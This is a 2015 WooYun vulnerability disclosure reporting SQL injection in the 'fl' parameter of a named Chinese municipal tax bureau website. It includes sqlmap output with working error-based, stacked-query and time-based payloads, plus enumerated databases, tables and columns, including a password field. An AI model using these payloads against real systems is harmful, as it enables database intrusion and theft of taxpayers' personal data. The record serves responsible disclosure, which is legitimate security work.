当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111137

漏洞标题:山东某市国家税务局分站存在SQL注射【二】

相关厂商:滨州市国税局

漏洞作者: Yang

提交时间:2015-04-29 20:25

修复时间:2015-06-18 10:06

公开时间:2015-06-18 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:12

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-29: 细节已通知厂商并且等待厂商处理中
2015-05-04: 厂商已经确认,细节仅向厂商公开
2015-05-14: 细节向核心白帽子及相关领域专家公开
2015-05-24: 细节向普通白帽子公开
2015-06-03: 细节向实习白帽子公开
2015-06-18: 细节向公众公开

简要描述:

存在于什么纳税人之家
还有纳税人网校

详细说明:

1.png


http://ws.bzsqgs.com/YC_xwList.aspx?fl=1 (GET)
fl参数存在SQL注射

sqlmap identified the following injection points with a total of 61 HTTP(s) requests:
---
Parameter: fl (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: fl=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: fl=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: fl (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: fl=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: fl=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] YC_GuoShuiJu


跑了一个库

back-end DBMS: Microsoft SQL Server 2005
Database: YC_GuoShuiJu
[42 tables]
+----------------------+
| WX_Tixing |
| WX_hangye |
| WX_info |
| WX_kaoshi |
| WX_kecheng |
| WX_ksResult |
| WX_lanmu |
| WX_lwkc |
| WX_pxkc |
| WX_sheying |
| WX_shoucang |
| WX_shouke |
| WX_shouke_r_xuesheng |
| WX_tiku |
| WX_tongzhi |
| WX_xianqu |
| WX_xuanxiang |
| WX_xuesheng |
| WX_yijian |
| YC_bmzhanghao |
| YC_bumen |
| YC_daan |
| YC_huifu |
| YC_lanmu |
| YC_liuyan |
| YC_lyfenlei |
| YC_mingan |
| YC_quanxian |
| YC_users |
| YC_xiazai |
| YC_xinxi |
| YC_xqfenlei |
| YC_xuqiu |
| YC_xzfenlei |
| YC_yonghu |
| YC_zbsj |
| YC_zhiban |
| YC_zhuanjia |
| YC_zjliuyan |
| htlm |
| jubao |
| jubaohuifu |
+----------------------+
Database: YC_GuoShuiJu
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| dbo.YC_daan | 346 |
| dbo.YC_xinxi | 248 |
| dbo.WX_shouke_r_xuesheng | 148 |
| dbo.WX_xuesheng | 129 |
| dbo.YC_zhiban | 123 |
| dbo.YC_huifu | 82 |
| dbo.YC_liuyan | 66 |
| dbo.WX_info | 43 |
| dbo.htlm | 36 |
| dbo.YC_xqfenlei | 29 |
| dbo.YC_zhuanjia | 28 |
| dbo.WX_xuanxiang | 16 |
| dbo.WX_hangye | 14 |
| dbo.WX_lanmu | 12 |
| dbo.WX_Tixing | 11 |
| dbo.WX_xianqu | 10 |
| dbo.WX_tiku | 9 |
| dbo.jubao | 7 |
| dbo.WX_kecheng | 7 |
| dbo.YC_lanmu | 7 |
| dbo.YC_lyfenlei | 7 |
| dbo.YC_quanxian | 7 |
| dbo.WX_shoucang | 5 |
| dbo.WX_shouke | 5 |
| dbo.YC_xuqiu | 4 |
| dbo.YC_bumen | 3 |
| dbo.YC_mingan | 3 |
| dbo.YC_yonghu | 3 |
| dbo.jubaohuifu | 2 |
| dbo.YC_xiazai | 2 |
| dbo.YC_zbsj | 2 |
| dbo.YC_users | 1 |
| dbo.YC_xzfenlei | 1 |
+--------------------------+---------+
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: fl (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: fl=1' AND 4372=CONVERT(INT,(SELECT CHAR(113)+CHAR(107)+CHAR(120)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (4372=4372) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(122)+CHAR(120)+CHAR(113))) AND 'bCqq'='bCqq
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: fl=1'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: fl=1' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005
Database: YC_GuoShuiJu
Table: WX_xuesheng
[22 columns]
+-----------+----------+
| Column | Type |
+-----------+----------+
| gsdz | varchar |
| gsmc | varchar |
| guhua | varchar |
| hyId | int |
| id | int |
| jifen | int |
| lastTime | datetime |
| lastTime1 | datetime |
| LastTime2 | datetime |
| mail | varchar |
| pwd | varchar |
| sjh | varchar |
| spKcIds | varchar |
| sshy | varchar |
| uName | varchar |
| xb | int |
| xqId | varchar |
| xqmc | varchar |
| xuehao | varchar |
| yzsjh | varchar |
| zcsj | varchar |
| zsxm | varchar |
+-----------+----------+


漏洞证明:

有数据的

1.png


1.png


都是公司去国税局培训

修复方案:

版权声明:转载请注明来源 Yang@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-05-04 10:05

厂商回复:

CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置

最新状态:

暂无